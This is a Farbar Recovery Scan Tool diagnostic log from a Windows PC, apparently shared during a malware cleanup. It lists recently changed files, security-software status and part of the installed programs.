2014-09-14 23:25 - 2014-09-14 23:24 - 04927216 _____ (AVG Technologies) C:\Users\THINK\Desktop\avg_free_stb_all_2014_4765.exe
2014-09-14 22:56 - 2009-09-29 21:27 - 00000000 ____D () C:\Users\THINK\AppData\Roaming\Winamp
2014-09-14 22:20 - 2014-09-14 22:20 - 00000976 _____ () C:\Users\Public\Desktop\IObit Malware Fighter.lnk
2014-09-14 22:20 - 2014-09-14 22:20 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\IObit Malware Fighter
2014-09-14 22:20 - 2014-07-21 19:55 - 00000000 ____D () C:\Users\THINK\AppData\Roaming\IObit
2014-09-14 22:20 - 2014-07-21 19:55 - 00000000 ____D () C:\Program Files\IObit
2014-09-14 22:05 - 2014-09-14 22:02 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\木马清除专家 2014
2014-09-14 22:01 - 2014-09-14 22:00 - 13221712 _____ () C:\Users\THINK\Desktop\avt_setup.exe
2014-09-14 21:09 - 2013-10-06 18:14 - 00000000 ____D () C:\Users\THINK\Desktop\常用软件
2014-09-14 21:09 - 2013-02-16 19:04 - 00000000 ____D () C:\Users\THINK\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\hao123桌面版
2014-09-14 21:09 - 2012-02-23 13:37 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\超级函数表达式运算器
2014-09-14 21:09 - 2010-05-16 07:56 - 00000000 ____D () C:\Users\THINK\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\FlashFXP
2014-09-14 21:09 - 2009-09-15 09:50 - 00000000 ____D () C:\Users\THINK\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\电精2
2014-09-14 21:09 - 2009-09-12 05:34 - 00000000 ____D () C:\Users\THINK\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Microsoft AppLocale
2014-09-14 21:09 - 2009-09-11 21:42 - 00000000 ____D () C:\Users\THINK\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\拳皇97
2014-09-14 19:59 - 2014-09-14 19:59 - 00000049 _____ () C:\Users\THINK\AppData\Roaming\pk.ini
2014-09-14 19:59 - 2014-09-14 19:59 - 00000000 ____D () C:\Users\THINK\Desktop\顽固木马克星
2014-09-14 19:59 - 2014-09-14 19:52 - 24403519 _____ () C:\Users\THINK\Desktop\360compkill5.1.0.1102-0905.zip
2014-09-14 19:56 - 2014-09-14 19:55 - 04838816 _____ () C:\Users\THINK\Desktop\TrojanKill.exe
2014-09-14 18:24 - 2006-11-02 07:18 - 00000000 ____D () C:\windows\schemas
2014-09-14 18:17 - 2011-01-16 02:29 - 00000012 _____ () C:\windows\bthservsdp.dat
2014-09-14 18:17 - 2006-11-02 09:01 - 00032668 _____ () C:\windows\Tasks\SCHEDLGU.TXT
2014-09-14 17:44 - 2012-03-11 11:14 - 00000000 ____D () C:\Program Files\MemTest
2014-09-14 17:44 - 2010-05-16 07:56 - 00000000 ____D () C:\Program Files\FlashFXP
2014-09-14 17:19 - 2014-09-14 17:19 - 00000909 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-09-14 17:19 - 2014-09-14 17:19 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-09-14 17:19 - 2014-09-14 17:19 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-09-14 17:19 - 2013-07-11 01:00 - 00000000 ____D () C:\Users\THINK\AppData\Roaming\Malwarebytes
2014-09-14 17:19 - 2013-07-11 01:00 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-09-14 17:19 - 2013-07-11 01:00 - 00000000 ____D () C:\Program Files\Malwarebytes' Anti-Malware
2014-09-14 16:56 - 2011-06-21 07:09 - 00000000 ____D () C:\ProgramData\360SD
2014-09-14 16:45 - 2014-09-12 19:10 - 00000000 __SHD () C:\Users\THINK\AppData\Roaming\360Quarant
2014-09-14 16:30 - 2014-09-14 12:57 - 00000000 ____D () C:\Qoobox
2014-09-14 16:30 - 2011-09-02 18:30 - 00000000 ____D () C:\Users\THINK\AppData\Local\Apps\2.0
2014-09-14 16:29 - 2014-09-14 16:29 - 00041256 _____ () C:\ComboFix.txt
2014-09-14 16:29 - 2013-02-26 22:43 - 00000000 ____D () C:\Users\Administrator
2014-09-14 16:29 - 2006-11-02 07:18 - 00000000 ___RD () C:\Users\Public
2014-09-14 16:28 - 2014-09-14 12:57 - 00000000 ____D () C:\windows\erdnt
2014-09-14 16:21 - 2006-11-02 06:23 - 00000215 _____ () C:\windows\system.ini
2014-09-14 15:57 - 2011-03-18 11:02 - 00000000 ____D () C:\Users\THINK\AppData\Roaming\Baidu
2014-09-14 15:56 - 2009-09-10 04:15 - 00000000 ____D () C:\Users\THINK
2014-09-14 13:14 - 2009-09-11 00:43 - 00002708 _____ () C:\Users\THINK\AppData\Local\d3d9caps.dat
2014-09-14 12:55 - 2014-09-14 12:55 - 05578360 ____R (Swearware) C:\Users\THINK\Desktop\ComboFix.exe
2014-09-14 12:48 - 2014-09-14 12:48 - 01097728 _____ (Farbar) C:\Users\THINK\Desktop\FRST.exe
2014-09-14 12:36 - 2013-06-04 00:29 - 00000000 ____D () C:\ProgramData\QMovie
2014-09-14 12:28 - 2014-09-14 12:24 - 117624056 _____ (Microsoft Corporation) C:\Users\THINK\Desktop\msert.exe
2014-09-14 12:25 - 2014-09-14 12:25 - 30856384 _____ (Microsoft Corporation) C:\Users\THINK\Desktop\Windows-KB890830-V5.16.exe
2014-09-14 01:20 - 2014-09-14 01:20 - 00000000 ____D () C:\ProgramData\ksrbm
2014-09-14 01:20 - 2010-11-06 05:57 - 00000000 ____D () C:\ProgramData\Kingsoft
2014-09-14 00:49 - 2010-01-28 05:47 - 00000000 ____D () C:\Users\THINK\AppData\Roaming\kingsoft
2014-09-14 00:37 - 2014-07-01 00:59 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\合金弹头全集
2014-09-14 00:37 - 2009-09-12 02:13 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\RaySource
2014-09-13 23:57 - 2014-09-13 23:57 - 00000662 _____ () C:\Users\Public\Desktop\可牛急救箱.lnk
2014-09-13 23:57 - 2014-09-13 23:57 - 00000000 ____D () C:\Users\THINK\Desktop\可牛系统急救箱
2014-09-13 23:57 - 2014-09-13 23:57 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\可牛急救箱
2014-09-13 23:51 - 2014-09-08 14:29 - 00000000 ____D () C:\Users\THINK\Documents\QiyiVideoLibrary
2014-09-13 23:42 - 2014-09-13 23:41 - 00928768 _____ () C:\Users\THINK\Desktop\可牛系统急救箱_@106316@.exe
2014-09-13 23:13 - 2011-08-07 08:04 - 00000000 ____D () C:\Temp
2014-09-13 22:55 - 2014-09-13 22:54 - 16578402 _____ ( ) C:\Users\THINK\Desktop\DLLSuite_Setup.exe
2014-09-13 22:09 - 2012-09-24 15:54 - 00000000 ____D () C:\windows\pss
2014-09-12 21:24 - 2013-05-04 21:12 - 00000000 ____D () C:\Users\THINK\AppData\Roaming\Media Player Classic
2014-09-12 21:24 - 2009-09-15 01:22 - 00000000 ____D () C:\Users\THINK\AppData\Roaming\DAEMON Tools Lite
2014-09-12 21:24 - 2009-09-12 20:08 - 00000000 ____D () C:\windows\Minidump
2014-09-12 21:11 - 2014-07-21 23:20 - 63619072 _____ () C:\windows\system32\config\SOFTWARE.iobit
2014-09-12 21:11 - 2014-07-21 23:20 - 42569728 _____ () C:\windows\system32\config\COMPONENTS.iobit
2014-09-12 21:11 - 2014-07-21 23:20 - 00311296 _____ () C:\windows\system32\config\DEFAULT.iobit
2014-09-12 21:11 - 2014-07-21 23:20 - 00065536 _____ () C:\windows\system32\config\SAM.iobit
2014-09-12 21:11 - 2014-07-21 23:20 - 00032768 _____ () C:\windows\system32\config\SECURITY.iobit
2014-09-12 20:49 - 2014-07-20 21:40 - 00000000 ____D () C:\Users\THINK\AppData\Roaming\360SuperKiller
2014-09-12 18:56 - 2012-04-05 19:23 - 00701104 _____ (Adobe Systems Incorporated) C:\windows\system32\FlashPlayerApp.exe
2014-09-12 18:56 - 2011-05-12 21:14 - 00071344 _____ (Adobe Systems Incorporated) C:\windows\system32\FlashPlayerCPLApp.cpl
2014-09-11 23:04 - 2014-09-11 23:02 - 00711168 _____ () C:\Users\THINK\Desktop\第七章_半导体的表面.ppt
2014-09-11 18:17 - 2009-09-10 17:45 - 00342518 _____ () C:\windows\system32\prfh0804.dat
2014-09-11 18:17 - 2009-09-10 17:45 - 00121114 _____ () C:\windows\system32\prfc0804.dat
2014-09-11 18:17 - 2006-11-02 06:33 - 01237302 _____ () C:\windows\system32\PerfStringBackup.INI
2014-09-11 00:14 - 2014-09-11 00:14 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\墿崹僼儘儞僥傿傾
2014-09-10 23:45 - 2014-09-10 23:45 - 00000000 ____D () C:\Users\Public\SogouInput
2014-09-10 23:44 - 2014-09-10 23:44 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\搜狗拼音输入法
2014-09-10 23:44 - 2014-09-10 23:44 - 00000000 _____ () C:\windows\system32\nsyF3B8.tmp
2014-09-10 02:07 - 2012-08-05 23:52 - 00000000 ____D () C:\Users\THINK\Desktop\··原来的桌面
2014-09-10 02:05 - 2013-09-01 12:37 - 00000000 ____D () C:\Users\THINK\Desktop\杂
2014-09-10 02:04 - 2014-09-10 02:04 - 00000000 ____D () C:\Users\THINK\AppData\Roaming\Foxit Software
2014-09-10 02:02 - 2011-08-19 06:19 - 00000000 ____D () C:\Users\THINK\Desktop\新建文件夹
2014-09-08 15:03 - 2012-12-31 22:54 - 00000000 ____D () C:\Users\THINK\AppData\Roaming\KuGou8
2014-09-08 14:32 - 2014-09-08 14:32 - 00000000 ____D () C:\ProgramData\LocalStorage
2014-09-08 14:29 - 2014-09-08 14:29 - 00000000 ____D () C:\Users\THINK\AppData\Roaming\IQIYI Video
2014-09-08 14:29 - 2014-09-08 14:28 - 00000000 ____D () C:\Users\Public\QiYi
2014-09-06 21:40 - 2014-09-06 21:40 - 00000000 ____D () C:\Users\THINK\Desktop\小毛
2014-09-06 19:55 - 2014-09-06 19:55 - 00000000 ____D () C:\Users\THINK\AppData\Local\thunder network
2014-09-05 21:01 - 2011-03-21 06:25 - 00002193 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\P2pSearcher.exe.lnk
2014-09-05 00:18 - 2011-05-17 04:07 - 00000954 _____ () C:\Users\THINK\AppData\Roaming\CoreAVC.ini
2014-09-02 00:29 - 2012-02-10 01:18 - 00000000 ____D () C:\Users\THINK\AppData\Roaming\SPlayer
2014-09-01 19:59 - 2013-12-06 13:16 - 00000000 ____D () C:\Users\THINK\Desktop\property
2014-09-01 06:33 - 2014-09-01 06:33 - 00016393 _____ () C:\windows\system32\hs_err_pid7548.log
2014-08-29 13:01 - 2006-11-02 06:24 - 98758480 _____ (Microsoft Corporation) C:\windows\system32\mrt.exe
2014-08-29 11:02 - 2014-08-29 11:02 - 00258932 _____ () C:\Users\THINK\Desktop\rephotos32ericson.zip
2014-08-28 11:59 - 2014-02-04 20:21 - 00000000 ____D () C:\Users\THINK\Desktop\文件
2014-08-27 11:47 - 2006-11-02 07:18 - 00000000 ____D () C:\windows\Microsoft.NET
2014-08-27 11:02 - 2006-11-02 07:18 - 00000000 ____D () C:\windows\rescache
2014-08-27 10:44 - 2013-12-08 18:02 - 00461528 _____ () C:\windows\system32\FNTCACHE.DAT
2014-08-27 00:36 - 2006-11-02 07:18 - 00000000 ____D () C:\windows\system32\zh-CN
2014-08-27 00:35 - 2006-11-02 08:37 - 00000000 ____D () C:\Program Files\Windows Journal
2014-08-27 00:33 - 2014-05-11 22:44 - 00000754 _____ () C:\Users\Administrator.THINK-PC\Desktop\QQ旋风.lnk
2014-08-26 21:49 - 2014-08-26 21:49 - 00002048 _____ (Microsoft Corporation) C:\windows\system32\tzres.dll
2014-08-26 21:49 - 2014-07-21 19:55 - 00000994 _____ () C:\Users\Public\Desktop\Advanced SystemCare 7.lnk
2014-08-26 21:48 - 2014-08-26 21:48 - 02263552 _____ (Microsoft Corporation) C:\windows\system32\msi.dll
2014-08-26 21:48 - 2014-08-26 21:48 - 01993728 _____ (Microsoft Corporation) C:\windows\system32\authui.dll
2014-08-26 21:48 - 2014-08-26 21:48 - 00638400 _____ (Microsoft Corporation) C:\windows\system32\Drivers\dxgkrnl.sys
2014-08-26 21:48 - 2014-08-26 21:48 - 00332800 _____ (Microsoft Corporation) C:\windows\system32\msihnd.dll
2014-08-26 21:48 - 2014-08-26 21:48 - 00082432 _____ (Microsoft Corporation) C:\windows\system32\consent.exe
2014-08-26 21:48 - 2014-08-26 21:48 - 00037376 _____ (Microsoft Corporation) C:\windows\system32\cdd.dll
2014-08-26 21:48 - 2014-08-26 21:48 - 00033280 _____ (Microsoft Corporation) C:\windows\system32\appinfo.dll
2014-08-26 21:44 - 2014-08-26 21:44 - 12356608 _____ (Microsoft Corporation) C:\windows\system32\mshtml.dll
2014-08-26 21:44 - 2014-08-26 21:44 - 09739264 _____ (Microsoft Corporation) C:\windows\system32\ieframe.dll
2014-08-26 21:44 - 2014-08-26 21:44 - 02382848 _____ (Microsoft Corporation) C:\windows\system32\mshtml.tlb
2014-08-26 21:44 - 2014-08-26 21:44 - 01129472 _____ (Microsoft Corporation) C:\windows\system32\wininet.dll
2014-08-26 21:44 - 2014-08-26 21:44 - 00607744 _____ (Microsoft Corporation) C:\windows\system32\msfeeds.dll
2014-08-26 21:44 - 2014-08-26 21:44 - 00353792 _____ (Microsoft Corporation) C:\windows\system32\dxtmsft.dll
2014-08-26 21:44 - 2014-08-26 21:44 - 00223232 _____ (Microsoft Corporation) C:\windows\system32\dxtrans.dll
2014-08-26 21:44 - 2014-08-26 21:44 - 00176640 _____ (Microsoft Corporation) C:\windows\system32\ieui.dll
2014-08-26 21:44 - 2014-08-26 21:44 - 00073216 _____ (Microsoft Corporation) C:\windows\system32\mshtmled.dll
2014-08-26 21:44 - 2014-08-26 21:44 - 00065536 _____ (Microsoft Corporation) C:\windows\system32\jsproxy.dll
2014-08-26 21:44 - 2014-08-26 21:44 - 00041472 _____ (Microsoft Corporation) C:\windows\system32\msfeedsbs.dll
2014-08-26 21:44 - 2014-08-26 21:44 - 00011776 _____ (Microsoft Corporation) C:\windows\system32\mshta.exe
2014-08-26 21:44 - 2014-08-26 21:44 - 00010752 _____ (Microsoft Corporation) C:\windows\system32\msfeedssync.exe
2014-08-26 21:43 - 2014-08-26 21:43 - 01810432 _____ (Microsoft Corporation) C:\windows\system32\jscript9.dll
2014-08-26 21:43 - 2014-08-26 21:43 - 01802240 _____ (Microsoft Corporation) C:\windows\system32\iertutil.dll
2014-08-26 21:43 - 2014-08-26 21:43 - 01427968 _____ (Microsoft Corporation) C:\windows\system32\inetcpl.cpl
2014-08-26 21:43 - 2014-08-26 21:43 - 01137664 _____ (Microsoft Corporation) C:\windows\system32\urlmon.dll
2014-08-26 21:43 - 2014-08-26 21:43 - 00717824 _____ (Microsoft Corporation) C:\windows\system32\jscript.dll
2014-08-26 21:43 - 2014-08-26 21:43 - 00421376 _____ (Microsoft Corporation) C:\windows\system32\vbscript.dll
2014-08-26 21:43 - 2014-08-26 21:43 - 00273408 _____ (Microsoft Corporation) C:\windows\system32\Drivers\afd.sys
2014-08-26 21:43 - 2014-08-26 21:43 - 00231936 _____ (Microsoft Corporation) C:\windows\system32\url.dll
2014-08-26 21:43 - 2014-08-26 21:43 - 00142848 _____ (Microsoft Corporation) C:\windows\system32\ieUnatt.exe
2014-08-26 21:42 - 2014-08-26 21:42 - 02051072 _____ (Microsoft Corporation) C:\windows\system32\win32k.sys
2014-08-26 21:42 - 2014-08-26 21:42 - 01401344 _____ (Microsoft Corporation) C:\windows\system32\msxml6.dll
2014-08-26 21:42 - 2014-08-26 21:42 - 01248768 _____ (Microsoft Corporation) C:\windows\system32\msxml3.dll
2014-08-26 21:42 - 2014-08-26 21:42 - 00506880 _____ (Microsoft Corporation) C:\windows\system32\qedit.dll
2014-08-26 21:41 - 2014-08-26 21:41 - 00915392 _____ (Microsoft Corporation) C:\windows\system32\Drivers\tcpip.sys
2014-08-26 21:41 - 2014-08-26 21:41 - 00502784 _____ (Microsoft Corporation) C:\windows\system32\usp10.dll
2014-08-26 21:41 - 2014-08-26 21:41 - 00031232 _____ (Microsoft Corporation) C:\windows\system32\Drivers\tcpipreg.sys
2014-08-26 21:40 - 2014-08-26 21:40 - 11587584 _____ (Microsoft Corporation) C:\windows\system32\shell32.dll
2014-08-26 21:40 - 2014-08-26 21:40 - 00894464 _____ (Microsoft Corporation) C:\windows\system32\kernel32.dll
2014-08-26 21:40 - 2014-08-26 21:40 - 00876032 _____ (Microsoft Corporation) C:\windows\system32\wer.dll
2014-08-26 00:18 - 2009-11-15 06:28 - 00000069 _____ () C:\windows\NeroDigital.ini
2014-08-25 10:38 - 2014-08-24 12:43 - 00000000 ____D () C:\Users\THINK\Desktop\dudley
2014-08-24 16:49 - 2014-08-24 16:49 - 00430080 _____ () C:\Users\THINK\Desktop\7-6空间直线及其方程.ppt
2014-08-24 10:48 - 2014-08-24 10:48 - 00000000 ____D () C:\$360Section
2014-08-24 10:48 - 2013-05-01 18:04 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Disabled Startup
2014-08-21 17:23 - 2011-10-26 05:10 - 00000000 ____D () C:\Program Files\Common Files\PPLiveNetwork
2014-08-19 01:50 - 2014-08-19 01:50 - 03695208 _____ (Sogou.com Inc.) C:\windows\system32\SogouPY.ime
 
Files to move or delete:
====================
C:\ProgramData\1doc2pdf.dll
 
 
Some content of TEMP:
====================
C:\Users\THINK\AppData\Local\Temp\avgnt.exe
C:\Users\THINK\AppData\Local\Temp\dl_peer_id.dll
C:\Users\THINK\AppData\Local\Temp\XmpSetupHelper.dll
 
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\windows\explorer.exe => File is digitally signed
C:\windows\system32\winlogon.exe => File is digitally signed
C:\windows\system32\wininit.exe => File is digitally signed
C:\windows\system32\svchost.exe => File is digitally signed
C:\windows\system32\services.exe => File is digitally signed
C:\windows\system32\User32.dll => File is digitally signed
C:\windows\system32\userinit.exe => File is digitally signed
C:\windows\system32\rpcss.dll => File is digitally signed
C:\windows\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2014-09-15 12:10
 
==================== End Of Log ============================
 
 
 
 
Addition.txt:
 
Additional scan result of Farbar Recovery Scan Tool (x86) Version: 12-09-2014
Ran by THINK at 2014-09-15 17:14:53
Running from C:\Users\THINK\Desktop
Boot Mode: Normal
==========================================================
 
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Avira Desktop (Disabled - Up to date) {4D041356-F94D-285F-8768-AAE50FA36859}
AV: 360杀毒 (Disabled - Up to date) {6F7A6B22-2309-7CD0-AF79-D11A4916C60C}
AS: Avira Desktop (Disabled - Up to date) {F665F2B2-DF77-27D1-BDD8-9197742422E4}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: IObit Malware Fighter (Disabled - Up to date) {A751AC20-3B48-5237-898A-78C4436BB78D}
 
==================== Installed Programs ======================
 
(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
 Update for Microsoft Office 2007 (KB2508958) (HKLM\...\{90120000-0011-0000-0000-0000000FF1CE}_PROPLUS_{0C5823AA-7B6F-44E1-8D5B-8FD1FF0E6438}) (Version:  - Microsoft)
115优蛋 (HKCU\...\115优蛋) (Version: 2.4.4.135 - 广东一一五网络有限公司)
2007 Office system 兼容包 (HKLM\...\{90120000-0020-0804-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation)
360杀毒 (HKLM\...\360SD) (Version: 5.0.0.5075 - 360安全中心)
91 PC Suite for iPhone (HKLM\...\{DACB19BF-B853-42FA-A686-8F55E065CA10}) (Version: 2.9.61.269 - 网龙公司)
Access Help (HKLM\...\{C6FA39A7-26B1-480A-BC74-6D17531AC222}) (Version: 2.00 - )
Adobe Flash Player 14 Plugin (HKLM\...\Adobe Flash Player Plugin) (Version: 14.0.0.145 - Adobe Systems Incorporated)
Adobe Flash Player 15 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 15.0.0.152 - Adobe Systems Incorporated)
Adobe Photoshop CS (HKLM\...\{EFB21DE7-8C19-4A88-BB28-A766E16493BC}) (Version: CS - Adobe Systems, Inc.)
Adobe Photoshop Lightroom 4.1 (HKLM\...\{C1575982-F1CA-46DC-A77D-43FF12F2EFC7}) (Version: 4.1.2 - Adobe)
Adobe Reader X (10.1.10) - Chinese Simplified (HKLM\...\{AC76BA86-7AD7-2052-7B44-AA1000000001}) (Version: 10.1.10 - Adobe Systems Incorporated)
Advanced SystemCare 7 (HKLM\...\Advanced SystemCare 7_is1) (Version: 7.3.0 - IObit)
Antivirus Pro (HKLM\...\Avira AntiVir Desktop) (Version: 14.0.6.570 - Avira)
Apple Mobile Device Support (HKLM\...\{E14ADE0E-75F3-4A46-87E5-26692DD626EC}) (Version: 6.1.0.13 - Apple Inc.)
Apple Software Update (HKLM\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
Apple 应用程序支持 (HKLM\...\{5D09C772-ECB3-442B-9CC6-B4341C78FDC2}) (Version: 2.3.4 - Apple Inc.)
ASIO4ALL (HKLM\...\ASIO4ALL) (Version:  - )
ATI Catalyst Install Manager (HKLM\...\{EE84642F-D557-A6F3-4F22-1B25A524E73E}) (Version: 3.0.774.0 - ATI Technologies, Inc.)
ATI Uninstaller (HKLM\...\ATI Uninstaller) (Version: 8.52.4.3-080821b-068591C-Lenovo - ATI Technologies, Inc.)
Bing Bar (HKLM\...\{D322A9E3-758B-4D60-A7C4-65C88FD378D0}) (Version: 7.2.241.0 - Microsoft Corporation)
Bonjour (HKLM\...\{79155F2B-9895-49D7-8612-D92580E0DE5B}) (Version: 3.0.0.10 - Apple Inc.)
CAJViewer (HKLM\...\{38CE8FAD-2E31-4CA8-B671-1BA7A8A54B28}) (Version: 7.0.2 - TTKN)
Camera Center (HKLM\...\{668ACF05-E455-4932-A2D2-5822A8206FEB}) (Version: 1.0.24 - Lenovo)
Canon SELPHY CP800 (HKLM\...\Canon SELPHY CP800) (Version:  - )
Canon Utilities SELPHY Photo Print (HKLM\...\SELPHY Photo Print) (Version: 1.2.0.7 - Canon Inc.)
Canon Utilities SELPHY Print Contents 1.1.0 (HKLM\...\SELPHY Print Contents 110) (Version: 1.1.0.16 - Canon Inc.)
Catalyst Control Center Core Implementation (Version: 2010.0504.2152.37420 - ATI) Hidden
Catalyst Control Center Graphics Full Existing (Version: 2010.0504.2152.37420 - ATI) Hidden
Catalyst Control Center Graphics Full New (Version: 2010.0504.2152.37420 - ATI) Hidden
Catalyst Control Center Graphics Light (Version: 2010.0504.2152.37420 - ATI) Hidden
Catalyst Control Center Graphics Previews Vista (Version: 2010.0504.2152.37420 - ATI) Hidden
Catalyst Control Center InstallProxy (Version: 2008.0821.2318.39887 - ATI Technologies, Inc.) Hidden
Catalyst Control Center InstallProxy (Version: 2010.0504.2152.37420 - ATI Technologies, Inc.) Hidden
Catalyst Control Center Localization All (Version: 2010.0504.2152.37420 - ATI) Hidden
CCC Help English (Version: 2010.0504.2151.37420 - ATI) Hidden
ccc-core-static (Version: 2010.0504.2152.37420 - 公司名称) Hidden
ccc-utility (Version: 2010.0504.2152.37420 - ATI) Hidden
Cisco EAP-FAST Module (HKLM\...\{64BF0187-F3D2-498B-99EA-163AF9AE6EC9}) (Version: 2.2.14 - Cisco Systems, Inc.)
Cisco LEAP Module (HKLM\...\{51C7AD07-C3F6-4635-8E8A-231306D810FE}) (Version: 1.0.19 - Cisco Systems, Inc.)
Cisco PEAP Module (HKLM\...\{ED5776D5-59B4-46B7-AF81-5F2D94D7C640}) (Version: 1.1.6 - Cisco Systems, Inc.)
Client Security - Password Manager (HKLM\...\{44E9D4C2-946C-4378-9354-558803C47A68}) (Version: 8.20.0023.00 - Lenovo Group Limited)
Compatibility Pack for the 2007 Office system (HKLM\...\{90120000-0020-0409-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation)
Conexant 20561 SmartAudio HD (HKLM\...\CNXT_AUDIO_HDA) (Version: 4.92.15.0 - Conexant)
Crystal Reports Basic Runtime for Visual Studio 2008 (HKLM\...\{CE26F10F-C80F-4377-908B-1B7882AE2CE3}) (Version: 10.5.2.0 - Business Objects)
CyberLink PowerDVD 10 (HKLM\...\InstallShield_{DEC235ED-58A4-4517-A278-C41E8DAEAB3B}) (Version: 10.0.1516 - CyberLink Corp.)
CyberLink PowerDVD 10 (Version: 10.0.1516 - CyberLink Corp.) Hidden
DH Mobility Modder.NET (HKLM\...\MobilityDotNET) (Version: 1.2.1.0 - Ruud Ketelaars)
DirectXInstallService (Version: 9.0.2 - Roxio) Hidden
Drag-to-Disc (HKLM\...\{2F4C24E6-CBD4-4AAC-B56F-C9FD44DE5668}) (Version: 9.05 - Sonic Solutions)
Dropbox (HKCU\...\Dropbox) (Version: 2.0.22 - Dropbox, Inc.)
easyMule (HKLM\...\easyMule) (Version:  - )
eMule (HKLM\...\eMule) (Version:  - )
EndNote X6 (HKLM\...\{86B3F2D6-AC2B-0016-8AE1-F2F77F781B0C}) (Version: 16.0.0.6348 - Thomson Reuters)
ESET Online Scanner v3 (HKLM\...\ESET Online Scanner) (Version:  - )
EVEREST Ultimate Edition v5.50 (HKLM\...\EVEREST Ultimate Edition_is1) (Version: 5.50 - Lavalys, Inc.)
Everything 1.2.1.371 (HKLM\...\Everything) (Version:  - )
Exact Audio Copy 1.0beta3 (HKLM\...\Exact Audio Copy) (Version: 1.0beta3 - Andre Wiethoff)
Fallout 3 (HKLM\...\{974C4B12-4D02-4879-85E0-61C95CC63E9E}) (Version: 1.00.0000 - Bethesda Softworks)
FCleaner 1.3.1.621 (HKLM\...\FCleaner_is1) (Version:  - FTweak, Inc.)
Foobar2000 v1.0.3 Final 汉化版 (HKLM\...\Foobar2000) (Version: v1.0.3 Final 汉化版 - Asion)
FormatFactory (HKLM\...\FormatFactory) (Version: 3.3.3.0 - FreeTime)
Foxit PDF Editor (HKLM\...\Foxit PDF Editor) (Version: 2.2.0.0205 - Foxit Software)
Foxit Reader (HKLM\...\Foxit Reader) (Version: 3.2.1.401 - Foxit Software Company)
Free PS Convert driver 8.15 (HKLM\...\Free PS Convert driver_is1) (Version:  - )
GIF Movie Gear 4.2.3 (HKLM\...\GIF Movie Gear_is1) (Version:  - gamani productions)
Google Chrome (HKLM\...\Google Chrome) (Version: 36.0.1985.125 - Google Inc.)
Google Talk (remove only) (HKLM\...\{226b64e8-dc75-4eea-a6c8-abcb496320f2}-Google Talk) (Version:  - )
Google Talk Plugin (HKLM\...\{C1E3DFE7-4EAD-3E9E-A826-E06055BA5921}) (Version: 5.4.2.18903 - Google)
Google Talk Plugin (HKLM\...\{DDB824DA-C431-3A3E-B997-F4B5539838FC}) (Version: 4.7.0.15362 - Google)
Google Update Helper (Version: 1.3.24.15 - Google Inc.) Hidden
HitmanPro 3.7 (HKLM\...\HitmanPro37) (Version: 3.7.9.221 - SurfRight B.V.)
HP Officejet Pro 8600 基本设备软件 (HKLM\...\{D735EA8D-C454-45D7-8410-C17960989048}) (Version: 28.0.1315.0 - Hewlett-Packard Co.)
HP Support Solutions Framework (HKLM\...\{C43602FE-988C-47BA-9F9F-B95FDDAFB624}) (Version: 11.50.0031 - Hewlett-Packard Company)
HydraVision (Version: 4.2.112.0 - ATI Technologies Inc.) Hidden
iCan3 (HKLM\...\iCan3) (Version: 1.0 - )
IE搜索助手 (HKLM\...\TXIEHlp) (Version: 3.0.3.2 - 腾讯公司)
Immunology Dictionary for CHS IME Web Release (Version: 1.0.0 - Microsoft) Hidden
Integrated Camera (HKLM\...\{399C37FB-08AF-493B-BFED-20FBD85EDF7F}) (Version: 5.8.8.012 - Sonix)
Intel® Management Engine Interface (HKLM\...\HECI) (Version:  - Intel Corporation)
InterVideo Register Manager (Version: 1.0.4.0 - InterVideo Inc.) Hidden
InterVideo WinDVD (HKLM\...\{91810AFC-A4F8-4EBA-A5AA-B198BBC81144}) (Version: 5.0-B11.1243 - InterVideo Inc.)
IObit Malware Fighter (HKLM\...\IObit Malware Fighter_is1) (Version: 2.4 - IObit)
IObit Uninstaller (HKLM\...\IObitUninstall) (Version: 3.2.10.2466 - IObit)
IP Address Shield (HKLM\...\IP Address Shield) (Version:  - )
iTools (HKLM\...\iTools) (Version:  - 深圳市创想天空科技有限公司)
iTudou 2.7.2.1 (HKLM\...\iTudou) (Version: 2.7.2.1 - 土豆网)
iTunes (HKLM\...\{91FD46D2-4FB7-4A51-8637-556E1BE1DB7C}) (Version: 11.0.4.4 - Apple Inc.)
Japanese Fonts Support For Adobe Reader X (HKLM\...\{AC76BA86-7AD7-5760-0000-A00000000003}) (Version: 10.0.0 - Adobe Systems Incorporated)
Java Auto Updater (Version: 2.0.2.4 - Sun Microsystems, Inc.) Hidden
Java™ 7 (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F83217000FF}) (Version: 7.0.0 - Sun Microsystems, Inc.)
K-Lite Codec Pack 9.8.5 (Full) (HKLM\...\KLiteCodecPack_is1) (Version: 9.8.5 - )
